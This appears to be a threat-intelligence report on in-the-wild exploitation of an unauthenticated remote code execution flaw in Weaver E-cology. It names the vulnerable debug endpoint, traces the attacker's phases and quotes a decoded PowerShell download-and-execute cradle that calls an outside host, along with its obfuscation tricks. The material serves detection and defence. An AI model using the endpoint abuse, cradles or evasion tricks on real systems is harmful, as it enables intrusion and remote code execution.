Ping, Payload, PowerShell: Active Exploitation of CVE-2026-22679 in Weaver E-cology

CVE-2026-22679 (CVSS 9.8) is an unauthenticated remote code execution vulnerability in Weaver (Fanwei) E-cology 10.0 builds prior to 20260312, exposed via the debug endpoint POST /papi/esearch/data/devops/dubboApi/debug/method. Attacker-controlled `interfaceName` and `methodName` JSON parameters reach the Dubbo RPC invoker and resolve into command-execution helpers, with no authentication or input validation. The vendor fix (build 20260312) removes the debug endpoint entirely and shipped on 2026-03-12. Earliest observed exploitation on a victim host began 2026-03-17 — five days after the patch and 14 days before the first public in-the-wild report on 2026-03-31.

On a compromised internet-reachable Windows host, every attacker-attributable process was parented by `java.exe` (Weaver's Tomcat-bundled JVM). Activity unfolded in four loose phases over roughly a week. The operator first verified RCE with three sequential `ping.exe -n 1` commands to a Goby-style callback URL (152.32.173[.]138 in `/U<16hex>.<8hex>` format) — the supplied URL is not a valid hostname, so verification was via the Dubbo debug endpoint's reflected HTTP response body rather than ICMP. They then attempted three PowerShell DownloadFile cradles (`vsgbt.exe`, `hjchhb.exe` from 205.209.116[.]54:2013, and a Base64-encoded stager that decoded a remote `config.js` to disk as `nvm.exe`, impersonating Node Version Manager) — all quarantined. The operator pivoted to MSI delivery, downloading `fanwei0324.msi` (target-aware naming: 泛微 + attack date) from 141.11.89[.]42 and invoking msiexec, but the package produced only a single NamedPipeEvent with no install actions, suggesting a malformed installer.

Within hours, the operator abandoned MSI and returned to the original java.exe RCE primitive. They staged a renamed PowerShell interpreter via `cmd /c copy ...\powershell.exe 2.txt`, then issued an obfuscated PowerShell command three times combining case randomization (`pOwErsHelL`, `byPaSS`), suppressive flags (`-NOprofIl`, `-WIndo HiDden`, `-Nonin`, `-nolOgo`), and a 576-integer character array that built `iex` indirectly via PowerShell variable-substring evasion so the literal `IEX` never appeared on the command line — decoding to a clear-text `IEX (New-Object Net.WebClient).DownloadString('http://132.243.172[.]2/config/xx.ps1')`. EDR flagged each attempt; the operator fell back to running the same DownloadString cradle through the renamed `2.txt` binary, with a path rotation to `/w-2026/x.ps1`. Discovery (`whoami`, `ipconfig`, `tasklist`) was interleaved throughout — never a discrete phase — all parented by java.exe, with output returned synchronously through the Dubbo debug endpoint's HTTP response body. The operator never needed a persistent shell: the debug endpoint is the shell.